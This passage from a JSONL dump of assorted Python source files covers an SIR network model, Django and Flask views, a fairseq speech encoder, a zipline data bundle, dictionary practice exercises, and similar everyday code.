Network(G,N,p_connected,pv,pi)\n\t\tself.G.distribute()\n\t\tself.r = (R0 * g) / self.G.degree()\n\t\tself.t = 0\n\n\tdef transit(self):\n\t\tlistaI = []\n\t\tlistaR = []\n\n\t\tnetwork = self.G.network()\n\t\t# neighbors = network.neighbors(i):\n\t\t# n_neighbors = len(neighbors)\n\n\t\tinfected = self.G.listOfClass('I')\n\n\t\tlista = []\n\t\tfor node in infected:\n\t\t\tneighbors = self.G.classNeighbors(node,\"S\")\n\t\t\tfor neighbor in neighbors:\n\t\t\t\t# if neighbor not in lista:\n\t\t\t\tlista.append(neighbor)\n\n\t\tp = self.r\n\t\tfor node in lista:\n\t\t\tr = random.random()\n\t\t\tif r < p:\n\t\t\t\tlistaI.append(node)\n\n\t\tp = self.g\n\t\tfor node in infected:\n\t\t\tr = random.random()\n\t\t\tif r < p:\n\t\t\t\tlistaR.append(node)\n\n\t\tfor i in listaI:\n\t\t\tnetwork.node[i]['state'] = 'I' \n\t\tfor r in listaR:\n\t\t\tnetwork.node[r]['state'] = 'R' \n\n\t\tself.t += 1\n\n\n\tdef stopped(self):\n\t\tsusceptible = self.G.listOfClass('S')\n\t\tflag = True\n\t\tfor node in susceptible:\n\t\t\tneighbors = self.G.classNeighbors(node,\"I\")\n\t\t\tif neighbors != []:\n\t\t\t\tflag = False\n\n\t\treturn flag and self.G.listOfClass('I') == []\n\n\n\tdef size(self):\n\t\treturn self.N\n\n","sub_path":"network/sirmodel.py","file_name":"sirmodel.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"650129466","text":"import tensorflow as tf\nsess = tf.InteractiveSession()\n\ninputs=tf.constant([ [\n\t\t\t\t\t[2,2] , [3,3] , [4,4] , [6,6] , [7,7] , [8,8] \n\t\t\t\t]\n\t\t\t\t,\n\t\t\t\t[\n\t\t\t\t\t[6,6] , [7,7] , [8,8] , [10,10] , [11,11] , [12,12]\n\t\t\t\t] ])\n#Batch , Encoder parts\nishape=inputs.get_shape().as_list()\nprint(ishape[0],ishape[1],ishape[2])\n\nclass AttentionAggregator():\n\tdef __init__(self,\n\t\t\t\tlstm_size=1,\n\t\t\t\t**kwargs):\n\t\tself.lstm_size=lstm_size\n\t\tself.cell=tf.contrib.rnn.BasicLSTMCell(lstm_size)\n\t\t# trainable scaling weight applied to the LSTM output\n\t\tself.kernel=tf.get_variable('kernel',\n                                    shape=[lstm_size, 1],\n                                    dtype=tf.float32,\n                                    trainable=True)\n\n\tdef call(self,inputs,state):\n\t\tinputs_to_lstm = tf.reshape(inputs,[-1,1])\n\t\tishape=inputs.get_shape().as_list()\n\t\toutput, state = self.cell(inputs_to_lstm, state)\n\t\toutput=output*self.kernel\n\t\toutput=tf.reshape(output,[ishape[0],-1])\n\t\treturn output, state\n","sub_path":"nmt/tester_attn_aggregator.py","file_name":"tester_attn_aggregator.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"444982020","text":"import urllib.request\r\n\r\nurl = 'https://yihui.name/cn/'\r\nresponse = urllib.request.urlopen(url)\r\n\r\ntitle = []\r\nhtml = response.read().decode('utf-8')\r\n\r\nwhile 'href=\"/cn/20' in html:\r\n    a = html.find('href=\"/cn/20')\r\n    b = html.find('>', a)\r\n    c = html.find('<', b)\r\n    title.append(html[b+1:c])\r\n    html = html[c:]\r\n\r\nfor each in title:\r\n    print(each)\r\n","sub_path":"spider/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"178728089","text":"\n\nfrom typed_ast import *\nfrom tnode import *\nfrom .. 
import substitution as sub\nfrom ..types import typ\n\nclass TTuple(TNode):\n\t\"\"\"\n\tA node representing a list of values.\n\t\"\"\"\n\n\tdef __init__(self, n):\n\t\tsuper(TTuple,self).__init__(n)\n\t\tself.name = \"Tuple\"\n\t\tself.elts = []\n\n\tdef format_tree(self,indents):\n\t\ts = super(TTuple,self).format_tree(indents)\n\t\ts += \" \"*indents + \"Elements: \\n\"\n\t\tfor e in self.elts: s += e.format_tree(indents+1)\n\t\treturn s\n\n\tdef traverse(self, env):\n\t\tlogging.info(\"Traversing a list...\")\n\t\tself.typ = typ.TTuple([])\n\t\tfor e in self.node.elts:\n\t\t\t(elem_node, elem_sub, elem_env) = typed_ast.TypedAST.traverse(e, env)\n\t\t\tself.elts.append(elem_node)\n\t\t\tself.typ.contained.append(elem_node.typ)\n\t\treturn (self, elem_sub, env)\n","sub_path":"pyinfer/src/typed_ast/ttuple.py","file_name":"ttuple.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"544673715","text":"from django.shortcuts import render,redirect,get_object_or_404\nfrom .forms import CreateDepartment\nfrom .models import Department\nfrom django.http import HttpResponse\n# Create your views here.\n\ndef index(request):\n if request.method == 'POST':\n form = CreateDepartment(request.POST)\n if form.is_valid():\n form.save()\n return redirect('transport:list')\n else:\n form = CreateDepartment()\n\n context = {\"message\":\"Welcome Note\",'form':form}\n return render(request, 'transport/index.html', context)\n\ndef list(request):\n data = Department.objects.all()\n context = {\"message\":\"Listing the Departments\", \"departmentlist\":data}\n return render(request, 'transport/list.html', context)\n\ndef edit(request,id):\n department = get_object_or_404(Department, pk=id)\n #https://sixfeetup.com/blog/django-form-data-in-post\n if request.method == 'POST':\n data = request.POST.copy()\n department.name = data.get('name')\n department.code = data.get('code')\n department.description = data.get('description')\n\n form = CreateDepartment(department.__dict__)\n ###using the form to validate the Model######\n if form.is_valid():\n print(department.__dict__)\n department.save()\n return redirect('transport:list')\n\n else:\n context = {'form': form}\n return render(request, 'transport/edit.html', context)\n else:\n form = CreateDepartment(department.__dict__)\n context = {'form': form}\n return render(request, 'transport/edit.html', context)\n\ndef detail(request,id):\n department = get_object_or_404(Department, pk=id)\n context={\n\n 'department': department,\n\n 'message':'Details for '+department.name +'Department'\n }\n\n return render(request, 'transport/detail.html', context)\n","sub_path":"transport/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"24189444","text":"# -*- coding: utf-8 -*-\n__prj__ = '1.0.0'\n__version__ = ''\n__license__ = 'GNU General Public License v3'\n__author__ = 'marcelo martinovic'\n__email__ = 'marcelo.martinovic@gmail.com'\n__url__ = ''\n__date__ = \"2013-11-20\"\n__updated__ = \"2013-11-20\"\n\nfrom django.db import models\n\n# Create your models here.\n","sub_path":"compras/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"274096683","text":"import torch.nn as nn\nfrom torch import Tensor\nfrom collections.abc 
import Iterable\nfrom typing import Optional\nfrom fairseq_las.models import DEFAULT_ENC_VGGBLOCK_CONFIG\nfrom fairseq_las.models.modules import lstm\nfrom fairseq_las.models.vggblock import VGGBlock\nfrom fairseq.models import FairseqEncoder\nfrom fairseq.modules import FairseqDropout\n\n\nclass FairseqListener(FairseqEncoder):\n def __init__(\n self,\n dictionary,\n input_dim: int = 80,\n vggblock_config: tuple = DEFAULT_ENC_VGGBLOCK_CONFIG,\n in_channels: int = 1,\n hidden_size: int = 512,\n num_layers: int = 3,\n dropout_in: float = 0.1,\n dropout_out: float = 0.1,\n bidirectional: bool = True\n ):\n super().__init__(dictionary)\n self.num_vgg_blocks = 0\n self.padding_idx = dictionary.pad()\n self.dropout_in_module = FairseqDropout(dropout_in, module_name=self.__class__.__name__)\n self.dropout_out_module = FairseqDropout(dropout_out, module_name=self.__class__.__name__)\n\n if vggblock_config is not None:\n if not isinstance(vggblock_config, Iterable):\n raise ValueError(\"vggblock_config is not iterable\")\n self.num_vggblocks = len(vggblock_config)\n\n self.conv_layers = nn.ModuleList()\n self.in_channels = in_channels\n self.input_dim = input_dim\n self.bidirectional = bidirectional\n self.num_layers = num_layers\n self.hidden_size = hidden_size\n\n if vggblock_config is not None:\n for _, config in enumerate(vggblock_config):\n (\n out_channels,\n conv_kernel_size,\n pooling_kernel_size,\n num_conv_layers,\n layer_norm\n ) = config\n self.conv_layers.append(\n VGGBlock(\n in_channels,\n out_channels,\n conv_kernel_size,\n pooling_kernel_size,\n num_conv_layers,\n input_dim=input_dim,\n layer_norm=layer_norm\n )\n )\n in_channels = out_channels\n input_dim = self.conv_layers[-1].output_dim\n\n self.lstm = lstm(\n input_size=input_dim << 7,\n hidden_size=hidden_size,\n num_layers=num_layers,\n dropout=self.dropout_out_module.p if num_layers > 1 else 0.,\n bidirectional=bidirectional\n )\n self.output_units = hidden_size\n if bidirectional:\n self.output_units <<= 1\n\n def forward(self, src_tokens: Tensor, src_lengths: Tensor = Optional[None], **kwargs):\n \"\"\"\n src_tokens: padded tensor B x T x C * feat\n src_lengths: tensor of original lengths of input utterances B\n \"\"\"\n batch_size = src_tokens.size(0)\n seq_length = src_tokens.size(1)\n\n x = src_tokens.view(batch_size, seq_length, self.in_channels, self.input_dim)\n x = x.transpose(1, 2).contiguous()\n\n for idx in range(len(self.conv_layers)):\n x = self.conv_layers[idx](x)\n\n batch_size = x.size(0)\n output_length = x.size(2)\n\n # (B x C x T x feat) => (B x T x C x feat) => (T x B x C x feat) => (T x B x C * feat)\n x = x.transpose(1, 2).transpose(0, 1)\n x = x.contiguous().view(output_length, batch_size, -1)\n\n subsampling_factor = int(seq_length * 1.0 / output_length + 0.5)\n input_lengths = (src_lengths.float() / subsampling_factor).ceil().long()\n\n packed_x = nn.utils.rnn.pack_padded_sequence(x, input_lengths, enforce_sorted=True)\n\n # apply LSTM\n if self.bidirectional:\n state_size = 2 * self.num_layers, batch_size, self.hidden_size\n else:\n state_size = self.num_layers, batch_size, self.hidden_size\n h0 = x.new_zeros(*state_size)\n c0 = x.new_zeros(*state_size)\n packed_outs, (final_hiddens, final_cells) = self.lstm(packed_x, (h0, c0))\n\n # unpack outputs and apply dropout\n x, _ = nn.utils.rnn.pad_packed_sequence(packed_outs, padding_value=self.padding_idx * 1.0)\n x = self.dropout_out_module(x)\n\n if self.bidirectional:\n final_hiddens = self.combine_bidirection(final_hiddens, batch_size)\n 
final_cells = self.combine_bidirection(final_cells, batch_size)\n\n return tuple((\n x,\n final_hiddens,\n final_cells\n ))\n\n def combine_bidirection(self, outs, batch_size: int):\n out = outs.view(self.num_layers, 2, batch_size, -1).transpose(1, 2).contiguous()\n return out.view(self.num_layers, batch_size, -1)\n\n def reorder_encoder_out(self, encoder_out, new_order):\n return tuple((\n encoder_out[0].index_select(1, new_order),\n encoder_out[1].index_select(1, new_order),\n encoder_out[2].index_select(1, new_order),\n None\n ))\n","sub_path":"fairseq_las/models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"322810848","text":"# 1. Write a Python program to create a dictionary from a string.\ndef create_dict(string: str):\n str_dict = {}\n for i, j in enumerate(string):\n str_dict.update({j: i})\n return str_dict\n\n\n# 2. Write a Python program to print a dictionary in a tab form.\ndef show_dict(dictionary: dict):\n for k, v in dictionary.items():\n print(k, '\\t', v)\n\n\n# 3. Write a Python program to check if value exists in a dictionary.\ndef exists(dictionary: dict, value: str):\n return value in dictionary.values()\n\n\n# 4․ Write a Python program to remove duplicate values from Dictionary.\ndef remove_duplicates(dictionary: dict):\n without_copies = {}\n # without_copies.update({i: dictionary[i] for i in dictionary if dictionary[i] not in without_copies.values()})\n # without_copies = {i: dictionary[i] for i in dictionary if dictionary[i] not in without_copies.values()}\n for i in dictionary:\n if dictionary[i] not in without_copies.values():\n without_copies.update({i: dictionary[i]})\n print(without_copies)\n\n\n# 5. Write a Python script to generate and print a dictionary\n# that contains a number (between 1 and n) in the form (x, x*x).\ndef dict_exp():\n n = int(input(\"Input number of elements: \"))\n dict_n = {i: i ** 2 for i in range(1, n + 1)}\n return dict_n\n\n\n# 6. Write a Python script to merge two Python dictionaries\ndef merge_dict(dict1: dict, dict2: dict):\n dict1.update(dict2)\n return dict1\n\n\n# 7. Write a Python program to sum all the items in a dictionary\ndef sum_dict(dictionary: dict):\n sum_ = 0\n for i in dictionary:\n if type(dictionary[i]) is int:\n sum_ += dictionary[i]\n return sum_\n\n\n# 8. Write a Python program to remove a key from a dictionary\ndef remove_key(dictionary: dict, key):\n if key in dictionary:\n del dictionary[key]\n return dictionary\n\n\n# 9. Write a Python program to map two lists into a dictionary\ndef map_list(list1: list, list2: list):\n dictionary = {}\n # dictionary = dict(zip(list1, list2))\n for i in range(len(list1)):\n dictionary.update({list1[i]: list2[i]})\n return dictionary\n\n\n# 10. Write a Python program to get the maximum and minimum value in a dictionary\ndef min_max(dictionary: dict):\n max_v = 0\n min_v = 0\n for i in dictionary:\n for j in dictionary:\n if dictionary[i] < dictionary[j]:\n max_v = dictionary[j]\n if dictionary[i] > dictionary[j]:\n min_v = dictionary[j]\n return max_v, min_v\n\n\n# 11. Write a Python program to check a dictionary is empty or not\ndef isempty(dictionary):\n if dictionary:\n return False\n return True\n\n\n# 12. Write a Python program to combine two dictionary adding values for common keys\ndef common_dict(dict1: dict, dict2: dict):\n dictionary = {}\n for i in dict1, dict2:\n dictionary.update(i)\n return dictionary\n\n\n# 13. 
Write a Python program to print all unique values in a dictionary\ndef unique_values(dictionary: dict):\n    ls = []\n    for i in dictionary:\n        if dictionary[i] not in ls:\n            ls.append(dictionary[i])\n    return ls\n\n\n# 14. Write a Python program to create and display all combinations of letters,\n# selecting each letter from a different key in a dictionary\n# (a sketch solution appears after exercise 18 below)\n\n\n# 15. Write a Python program to drop empty Items from a given Dictionary\ndef drop_empty(dictionary: dict):\n    new_dict = {k: v for k, v in dictionary.items() if v is not None}\n    return new_dict\n\n\n# 16. Sort Dictionary by keys in ascending(descending) order\ndef sort_ascending_k(dictionary: dict):\n    ls = list(dictionary.items())\n    for i in range(len(ls)):\n        for j in range(len(ls)):\n            if ls[i][0] < ls[j][0]:\n                ls[i], ls[j] = ls[j], ls[i]\n    dictionary = dict(ls)\n    return dictionary\n\n\ndef sort_descending_k(dictionary: dict):\n    ls = list(dictionary.items())\n    for i in range(len(ls)):\n        for j in range(len(ls)):\n            if ls[i][0] > ls[j][0]:\n                ls[i], ls[j] = ls[j], ls[i]\n    dictionary = dict(ls)\n    return dictionary\n\n\n# 17. Sort Dictionary by values in ascending(descending) order\ndef sort_ascending_v(dictionary: dict):\n    ls = list(dictionary.items())\n    for i in range(len(ls)):\n        for j in range(len(ls)):\n            if ls[i][1] < ls[j][1]:\n                ls[i], ls[j] = ls[j], ls[i]\n    dictionary = dict(ls)\n    return dictionary\n\n\ndef sort_descending_v(dictionary: dict):\n    ls = list(dictionary.items())\n    for i in range(len(ls)):\n        for j in range(len(ls)):\n            if ls[i][1] > ls[j][1]:\n                ls[i], ls[j] = ls[j], ls[i]\n    dictionary = dict(ls)\n    return dictionary\n\n\n# 18. Write a python program to remove spaces in dictionary keys and values.\ndef rm_spaces(dictionary: dict):\n    dictionary = {k.replace(' ',''): v.replace(' ','')\n                  for k, v in dictionary.items() if type(k) == str and type(v) == str}\n    print(dictionary)\n\n
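# A possible solution sketch for exercise 14 above, assuming the dictionary\n# maps each key to a string (or other iterable) of letters:\nfrom itertools import product\n\ndef letter_combinations(dictionary: dict):\n    for combo in product(*dictionary.values()):\n        print(''.join(combo))\n# e.g. letter_combinations({'a': 'xy', 'b': 'uv'}) prints xu, xv, yu, yv\n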
\n# 19. Find N most frequent words in text sequence, collecting data in a dictionary.\ndef validation(text: str) -> str:\n    for i in text:\n        if ord(i) in range(33, 65) or ord(i) \\\n                in range(91, 97) or ord(i) in range(123, 127):\n            text = text.replace(i, '')\n    return text\n\n\ndef frequent_words(text: str, n: int):\n    text = validation(text)  # strip punctuation before counting\n    ls_text = text.split()\n    dict_text = {}\n    for i in ls_text:\n        dict_text[i] = 0\n    for i in ls_text:\n        if i in dict_text.keys():\n            dict_text[i] += 1\n    dict_text = {i: dict_text[i] for i in sorted(dict_text, key=lambda k: dict_text[k], reverse=True)}\n    a = list(dict_text.items())\n    for i in range(n):\n        print(f\"\\t'{a[i][0]}'\\t-->\\t'{a[i][1]}'\")\n","sub_path":"DictionaryPractice.py","file_name":"DictionaryPractice.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"23789907","text":"import json\nimport requests\nfrom pprint import pprint\n\n\nwith open(\"D40/mount-data.json\", \"r\") as f:\n    data=json.load(f)\n\n    is_flying = []\n    for mount in data['mounts']['collected']:\n        if mount['isFlying']:\n            is_flying.append(mount)\n    print(len(is_flying))\n    for i in is_flying:\n        pprint(i['name'])\n","sub_path":"D40/api_and_json.py","file_name":"api_and_json.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"392399613","text":"import asyncio\nimport datetime\nimport pytz\n\nimport pandas as pd\nfrom zipline.data import bundles\nfrom zipline.utils import calendars\n\nfrom bundle import converter\n\ndef ingest(environ,\n           asset_db_writer,\n           minute_bar_writer,\n           daily_bar_writer,\n           adjustment_writer,\n           calendar,\n           start_session,\n           end_session,\n           cache,\n           show_progress,\n           output_dir):\n    # hard code for just 1 day for now\n    event_loop = asyncio.get_event_loop()\n    try:\n        event_loop.run_until_complete(\n            converter.LoadData(asset_db_writer, daily_bar_writer, show_progress,\n                               start_session, end_session))\n    finally:\n        pending_tasks = [\n            task for task in asyncio.Task.all_tasks() if not task.done()]\n        event_loop.run_until_complete(asyncio.gather(*pending_tasks))\n        event_loop.close()\n\n    # create empty SQLite tables to prevent lookup errors in algorithms\n    divs_splits = {\n        'divs': pd.DataFrame(columns=['sid', 'amount', 'ex_date', 'record_date',\n                                      'declared_date', 'pay_date']),\n        'splits': pd.DataFrame(columns=['sid', 'ratio', 'effective_date'])}\n    adjustment_writer.write(\n        splits=divs_splits['splits'], dividends=divs_splits['divs'])\n\nbundles.register(\n    'bitmex',\n    ingest,\n    calendar_name='24/7',\n    start_session=pd.Timestamp(pytz.utc.localize(datetime.datetime(2019, 8, 8))),\n    end_session=pd.Timestamp(pytz.utc.localize(datetime.datetime(2019, 8, 9))),\n)\n","sub_path":"zipline/bitmex/bundle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"189644546","text":"import csv\n\n\nclass CoOccurrenceMatrixParser():\n\n    def __init__(self, csv_file_path):\n        csv_file = open(csv_file_path, \"r\", newline=\"\")\n        self.csv_reader = csv.reader(csv_file, delimiter=',', quotechar=\"|\")\n\n    def parse(self):\n        output = dict()\n        # Get the keys\n        keys = next(self.csv_reader)\n        # Read to output\n        for row in self.csv_reader:\n            output_row = dict()\n            for index, value in enumerate(row):\n                # Skip the first column\n                if index != 0:\n                    output_row[keys[index]] = value\n            output[row[0]] = output_row\n        return 
output\n","sub_path":"server/helpers/CoOccurrenceMatrixParser.py","file_name":"CoOccurrenceMatrixParser.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"4236946","text":"import webapp2\n\nimport enki\nimport enki.libutil\nimport enki.textmessages as MSG\n\nfrom enki.extensions import Extension\nfrom enki.extensions import ExtensionPage\nfrom enki.modeldisplayname import EnkiModelDisplayName\nfrom enki.modelfriends import EnkiModelFriends\nfrom enki.modelmessage import EnkiModelMessage\n\n\nclass HandlerFriends( enki.HandlerBase ):\n\n\tdef get( self ):\n\t\tif self.ensure_is_logged_in() and self.ensure_has_display_name():\n\t\t\tself.render_tmpl( 'friends.html',\n\t\t\t active_menu = 'profile',\n\t\t\t data = EnkiModelFriends.get_friends_user_id_display_name_url( self.user_id ))\n\n\tdef post( self ):\n\t\tif self.ensure_is_logged_in() and self.ensure_has_display_name():\n\t\t\tself.check_CSRF()\n\t\t\tuser_id = self.user_id\n\t\t\tfriend_id_invite = self.request.get( 'invite' )\n\t\t\tfriend_id_remove = self.request.get( 'remove' )\n\t\t\tfriend_name_search = self.request.get( 'search' ).strip()[:( EnkiModelDisplayName.DISPLAY_NAME_LENGTH_MAX + 4 )] # 4 allows for some leading and trailing characters\n\t\t\talready_friends = ''\n\t\t\thas_friends = EnkiModelFriends.exist_by_user_id( user_id )\n\t\t\terror_message = ''\n\t\t\tresult = ''\n\n\t\t\tif friend_id_invite: # send invitation to user to become friend\n\t\t\t\toutcome = EnkiModelFriends.send_friend_request( user_id, int( friend_id_invite ))\n\t\t\t\tif outcome == EnkiModelFriends.INFO_FRIENDS:\n\t\t\t\t\tself.add_infomessage( MSG.SUCCESS(), MSG.FRIEND_ADDED( EnkiModelDisplayName.get_display_name( int( friend_id_invite ))))\n\t\t\t\telif outcome == enki.libutil.ENKILIB_OK:\n\t\t\t\t\tself.add_infomessage( MSG.SUCCESS(), MSG.FRIEND_INVITATION_SENT( EnkiModelDisplayName.get_display_name( int( friend_id_invite ))))\n\t\t\telif friend_id_remove: # unfriend\n\t\t\t\tEnkiModelFriends.remove_friend( user_id, int( friend_id_remove ))\n\t\t\t\thas_friends = EnkiModelFriends.exist_by_user_id( user_id )\n\t\t\t\tself.add_infomessage( MSG.SUCCESS(), MSG.FRIEND_REMOVED( EnkiModelDisplayName.get_display_name( int( friend_id_remove ))))\n\t\t\telif friend_name_search: # search for user to invite\n\t\t\t\tusers_ids_to_ignore = [ user_id ]\n\t\t\t\tif has_friends:\n\t\t\t\t\tusers_ids_to_ignore += EnkiModelFriends.get_friends_user_id( user_id )\n\t\t\t\tresult = EnkiModelDisplayName.find_users_by_display_name( friend_name_search, users_ids_to_ignore )\n\t\t\t\tif result.error == EnkiModelDisplayName.ERROR_DISPLAY_NAME_INVALID:\n\t\t\t\t\terror_message = MSG.DISPLAY_NAME_INVALID()\n\t\t\t\telif result.error == EnkiModelDisplayName.ERROR_DISPLAY_NAME_NOT_EXIST:\n\t\t\t\t\terror_message = MSG.DISPLAY_NAME_NOT_EXIST()\n\t\t\telse:\n\t\t\t\terror_message = MSG.DISPLAY_NAME_NEEDED()\n\n\t\t\tif has_friends:\n\t\t\t\talready_friends = EnkiModelFriends.get_friends_user_id_display_name_url( user_id )\n\n\t\t\tself.render_tmpl( 'friends.html',\n\t\t\t data = already_friends,\n\t\t\t error = error_message,\n\t\t\t result = result,\n\t\t\t friend_name = friend_name_search )\n\n\nclass HandlerMessages( enki.HandlerBase ):\n\n\tdef get( self ):\n\t\tif self.ensure_is_logged_in() and self.ensure_has_display_name():\n\t\t\tself.render_tmpl( 'messages.html',\n\t\t\t active_menu = 'profile',\n\t\t\t data = EnkiModelMessage.get_messages( self.user_id ))\n\n\tdef post( 
self ):\n\t\tif self.ensure_is_logged_in() and self.ensure_has_display_name():\n\t\t\tself.check_CSRF()\n\t\t\tuser_id = self.user_id\n\t\t\tmessage_accept = self.request.get( 'accept' )\n\t\t\tmessage_decline = self.request.get( 'decline' )\n\n\t\t\tif message_accept:\n\t\t\t\tsender_id = EnkiModelMessage.get_by_id( int( message_accept )).sender\n\t\t\t\tif sender_id:\n\t\t\t\t\tEnkiModelFriends.add_friend( user_id, sender_id )\n\t\t\t\t\tself.add_infomessage( MSG.SUCCESS(), MSG.FRIEND_ADDED( EnkiModelDisplayName.get_display_name( sender_id )))\n\t\t\telif message_decline:\n\t\t\t\tsender_id = EnkiModelMessage.get_by_id( int( message_decline )).sender\n\t\t\t\tif sender_id:\n\t\t\t\t\tEnkiModelMessage.remove_messages_crossed( user_id, sender_id )\n\n\t\t\tself.render_tmpl( 'messages.html',\n\t\t\t data = EnkiModelMessage.get_messages( self.user_id ) )\n\n\nclass ExtensionPageFriendsMessages( ExtensionPage ):\n\n\tdef __init__( self ):\n\t\tExtensionPage.__init__( self, route_name = 'profile', template_include = 'incfriendsmessages.html' )\n\n\tdef get_data( self, handler ):\n\t\tif handler.ensure_is_logged_in():\n\t\t\tfriends = EnkiModelFriends.count_by_user_id( handler.user_id )\n\t\t\tmessages = EnkiModelMessage.count_by_recipient( handler.user_id )\n\t\t\tdata = [ friends, messages ]\n\t\t\treturn data\n\n\nclass ExtensionPageMessageAlert( ExtensionPage ):\n\n\tdef __init__( self ):\n\t\tExtensionPage.__init__( self, route_name = 'navbar', template_include = 'incmessagealert.html' )\n\n\tdef get_data( self, handler ):\n\t\tdata = [ 0 ]\n\t\tif handler.user_id:\n\t\t\tif EnkiModelMessage.exist_by_recipient( handler.user_id ):\n\t\t\t\tdata = [ 1 ] # user has message\n\t\treturn data\n\n\nclass ExtensionFriends( Extension ):\n\n\tdef get_routes( self ):\n\t\treturn [ webapp2.Route( '/friends', HandlerFriends, name = 'friends' ),\n\t\t webapp2.Route( '/messages', HandlerMessages, name = 'messages' ),\n\t\t ]\n\n\tdef get_page_extensions( self ):\n\t\treturn [ ExtensionPageFriendsMessages(), ExtensionPageMessageAlert()]\n","sub_path":"enki/handlersfriends.py","file_name":"handlersfriends.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"647709967","text":"from datetime import datetime\nfrom flask import Blueprint, session, abort, request, Response, json, Flask\nfrom werkzeug.utils import secure_filename\nfrom models.album import Album\nfrom models.album_tag import Album_tag\nfrom models.photo import Photo\nimport os\nimport services.serviceSettings\n\nalbum_bp = Blueprint('album', __name__)\n\n'''리눅스 서버에서 어떻게 돌릴지'''\nUPLOAD_FOLDER = 'C:\\\\Users\\\\Home\\\\Documents\\\\pholask-backend\\\\image'\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@album_bp.route(\"/\", methods=['POST'])\ndef make_album():\n if 'uid' in session:\n u = services.serviceSettings.u.findByUid(session['uid'])\n if request.json['title'] == \"\":\n abort(400)\n u.albums = [Album(title=request.json['title'], created_at=datetime.utcnow())]\n services.serviceSettings.u.addUser(u)\n a = services.serviceSettings.a.findByUid(session['uid'])\n for x in range(len(request.json['tag'])):\n a.album_tags.append(Album_tag(request.json['tag'][x]))\n x += 1\n services.serviceSettings.a.addAlbum(a)\n response = Response(status=200, content_type='application/json')\n data = json.dumps({\"aid\": a.aid, \"title\": a.title, \"createdAt\": 
a.created_at})\n        response.set_data(data)\n        return response\n    else:\n        return abort(401)\n\n@album_bp.route("/<aid>", methods=['DELETE'])\ndef delete_album(aid):\n    if 'uid' in session:\n        if services.serviceSettings.a.isValidAid(aid) == False:\n            abort(401)\n        a = services.serviceSettings.a.findByAid(aid)\n        if a == None:\n            abort(404)\n        u = services.serviceSettings.u.findByUid(uid=session['uid'])\n        if a.user_uid != u.uid:\n            abort(403)\n        services.serviceSettings.a.addAlbum(a)\n        response = Response(status=204, content_type='application/json')\n        return response\n    else:\n        abort(401)\n\n@album_bp.route("/<aid>/follow", methods=['POST'])\ndef follow_album(aid):\n    if 'uid' in session:\n        if services.serviceSettings.a.isValidAid(aid) == False:\n            abort(401)\n        a = services.serviceSettings.a.findByAid(aid)\n        if a == None:\n            abort(404)\n        follower = services.serviceSettings.u.findByUid(uid=session['uid'])\n        if (follower in a.follow) == True:\n            abort(409)\n        a.follow.append(follower)\n        services.serviceSettings.a.addAlbum(a)\n        response = Response(status=200, content_type='application/json')\n        data = json.dumps({\"follow\": \"true\", \"count\": len(a.follow)})\n        response.set_data(data)\n        return response\n    else:\n        abort(401)\n\n@album_bp.route("/<aid>/unfollow", methods=['POST'])\ndef unfollow_album(aid):\n    if 'uid' in session:\n        if services.serviceSettings.a.isValidAid(aid) == False:\n            abort(401)\n        a = services.serviceSettings.a.findByAid(aid)\n        if a == None:\n            abort(404)\n        follower = services.serviceSettings.u.findByUid(uid=session['uid'])\n        if (follower in a.follow) != True:\n            abort(409)\n        a.follow.remove(follower)\n        services.serviceSettings.a.addAlbum(a)\n        response = Response(status=200, content_type='application/json')\n        data = json.dumps({\"follow\": \"false\", \"count\": len(a.follow)})\n        response.set_data(data)\n        return response\n    else:\n        abort(401)\n\ndef allowed_file(filename):\n    return '.' 
in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@album_bp.route("/<aid>/photos", methods=['POST'])\ndef photos(aid):\n    if 'uid' in session:\n        if 'file' not in request.files:\n            return abort(401)\n        file = request.files['file']\n        if file.filename == '':\n            return abort(400)\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n        a = services.serviceSettings.a.findByAid(aid)\n        if a == None:\n            abort(404)\n        if a.user != services.serviceSettings.u.findByUid(session['uid']):\n            abort(403)\n        a.photos = [Photo(image=app.config['UPLOAD_FOLDER']+filename, content=request.form['content'], created_at=datetime.utcnow())]\n        services.serviceSettings.a.addAlbum(a)\n        return Response(status=201)\n    else:\n        abort(401)","sub_path":"routes/album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"598840153","text":"import sys\nimport pygame\n\npygame.init()\nscreen = pygame.display.set_mode((1280,720))\nbox = pygame.Rect(10,10,50,50)\nclock = pygame.time.Clock()\n\n\nwhile True:\n    #Handle 